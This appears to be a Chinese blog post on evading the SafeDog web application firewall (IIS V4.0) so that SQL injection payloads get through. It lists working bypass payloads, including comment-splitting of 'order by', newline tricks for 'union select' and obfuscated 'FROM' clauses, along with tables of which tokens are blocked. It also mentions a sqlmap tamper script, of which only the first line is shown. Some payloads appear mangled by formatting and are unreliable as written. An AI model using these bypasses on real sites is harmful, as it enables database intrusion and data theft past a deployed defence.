bypass安全狗
安全狗防护基本方法
本次使用的安全狗版本为:V4.0 27338 IIS 正式版,是官网截止2019年10月8号的最新版本,本篇文章主要介绍sql注入突破。
sql注入防护
在安全狗的默认防护规则中有一系列关于sql注入的防护
当初发这些规则时就会被拦截,例如:
bypass Sql注入防护
绕过总结(图片来自网上)
绕过 and 1=1
直接使用
and -1=-1
绕过使用注释绕过,50000表示mysql的大版本号为5.0版本
或者:
![20191008213555.png](../post_images/9ec06eb269700f42aa498a0878845935.png)
![20191008213654.png](../post_images/3ddff93d64d366f11527ad97e00dca1d.png)
使用减法或加法绕过,注意加号需要进行url编码
使用
&&
代替and,使用true
代替1=1
其它绕过说明只有and和
1=1
在一起时安全狗才会拦截,那就需要干扰安全狗将and和1=1
使用一系列注释和特殊字符分开,例如:_**/!and////!/!1=1/
**_payload 结果 and 未拦截 1=1 未拦截 and 1=1 拦截
绕过order by
payload | 结果 |
---|---|
order | 未拦截 |
by | 未拦截 |
order by | 拦截 |
说明只有order和by在一起时安全狗才会拦截。
使用
.
绕过使用
%23%0a
绕过fuzz出来的其它绕过方式,有很多,这里只举其中的5中方式
/!order /!///by/1,2,3,4
/!order //%//by/1,2,3,4
/!order ////by/1,2,3,4
/!order /!/////by/1,2,3,4
/!order /!//////by/1,2,3,4
绕过union select
payload | 结果 |
---|---|
union | 未拦截 |
select | 未拦截 |
union select | 拦截 |
说明只有union和select在一起时安全狗才会拦截。
安全狗对
union select
的过滤比较严,我只找到了一种绕过方法。
使用
--+aaaaaa%0a
绕过
绕过select from
payload | 结果 |
---|---|
select | 未拦截 |
from | 未拦截 |
select from | 未拦截 |
select 1 | 未拦截 |
from 1 | 拦截 |
from1 | 未拦截 |
说明from后面有空格时会拦截。
使用
-+
即可绕过(仅适用于from后面跟数字的情况):使用_
/!99999c//!99999c/FROM
_绕过
绕过database()
使用注释即可绕过:
sqlmap tamper
最后赠送过狗tamper
_#!/usr/bin/env python |
参考文章
评论
评论插件加载失败
正在加载评论插件